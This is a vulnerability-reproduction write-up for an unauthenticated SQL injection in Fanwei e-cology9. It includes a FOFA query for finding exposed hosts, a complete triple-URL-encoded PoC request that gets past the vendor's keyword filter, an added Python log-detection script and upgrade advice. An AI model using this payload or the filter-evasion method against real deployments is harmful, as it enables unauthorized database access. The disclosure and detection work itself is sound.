Fanwei e-cology9 SQL injection vulnerability reproduction【QVD-2023-5012】

Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article are borne by the user; the author bears no responsibility for adverse consequences. This article is for educational purposes only.

1. Product Introduction

e-cology is Fanwei's collaborative management application platform. It integrates an enterprise information portal, knowledge and document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and a data center into one large-scale collaborative management platform for enterprises.

2. Vulnerability overview

Fanwei e-cology9 contains a SQL injection vulnerability. An unauthenticated remote attacker can use it to read sensitive information from the database, and further exploitation may lead to the target system being taken over.

3. Affected scope

Affected versions

Fanwei e-cology9 <= 10.55

Unaffected versions

Fanwei e-cology9 >= 10.56

4. Reproduction environment

FOFA: app="Panwei-Collaborative Business System"


5. Vulnerability reproduction

Open the vulnerable environment, capture the request with Burp, and send it to the Repeater module.

PoC

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651


isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

Note: the PoC passes three parameters
1. isDis must be 1
2. browserTypeId selects the method
3. keyword is the injection point; it must be URL-encoded three times to get past Fanwei's filtering (the blacklist mechanism replaces matched keywords with full-width characters)
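The evasion described above, nested percent-encoding of the keyword parameter, is itself something a defender can look for in reverse-proxy or WAF logs. The following detection script is an added example and not code from the original post or from Fanwei; it assumes the logs keep the raw, still-encoded request line and POST body, and the sample requests it inspects are constructed here.

```python
import re
from urllib.parse import quote, unquote

# Assumption: requests are reconstructed from a reverse-proxy or WAF log that
# keeps the raw (still percent-encoded) request line and POST body.
SQLI_SYNTAX = re.compile(r"(?i)union\s+select|@@version|'\s*(or|and)\s|/\*|--\s*$")

def full_decode(value, max_rounds=8):
    """Percent-decode until stable; returns (decoded, number of layers removed)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds

def raw_params(body):
    """Split a form body without decoding, so nested encoding stays visible."""
    return {k: v for k, _, v in (p.partition("=") for p in body.split("&"))}

def inspect_request(path, body):
    """Score one POST to browser.jsp: more than one encoding layer on keyword is
    the evasion signature; the decoded text is also checked for SQL syntax."""
    params = raw_params(body)
    keyword, rounds = full_decode(params.get("keyword", ""))
    # The PoC path carries an encoded-space segment; no normal client sends that.
    segments = unquote(path).split("/")
    odd_segment = any(s and not s.strip() for s in segments)
    hit = bool(SQLI_SYNTAX.search(keyword))
    return {
        "decode_rounds": rounds,
        "sqli_syntax": hit,
        "odd_path_segment": odd_segment,
        "alert": rounds > 1 or hit or odd_segment,
    }

def nested_encode(text, layers):
    """Constructed test input: wrap text in N layers of percent-encoding."""
    for _ in range(layers):
        text = quote(text, safe="")
    return text

if __name__ == "__main__":
    # Constructed sample bodies, not traffic taken from the original post.
    benign = "isDis=1&browserTypeId=269&keyword=" + nested_encode("quarterly report", 1)
    evasive = "isDis=1&browserTypeId=269&keyword=" + nested_encode("x' union select 1", 3)
    print(inspect_request("/mobile/plugin/browser.jsp", benign))
    print(inspect_request("/mobile/%20/plugin/browser.jsp", evasive))
```

A single encoding layer is normal form submission and is not alerted on its own; the alert fires on nested layers, SQL syntax in the decoded value, or a whitespace-only path segment.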

Query database version information

Reproduced successfully

Dragon POC


6. Remediation

The vendor has released a security patch; affected users are advised to upgrade to version 10.56 or later as soon as possible.

https://www.weaver.com.cn/cs/securityDownload.asp


Origin blog.csdn.net/holyxp/article/details/131867577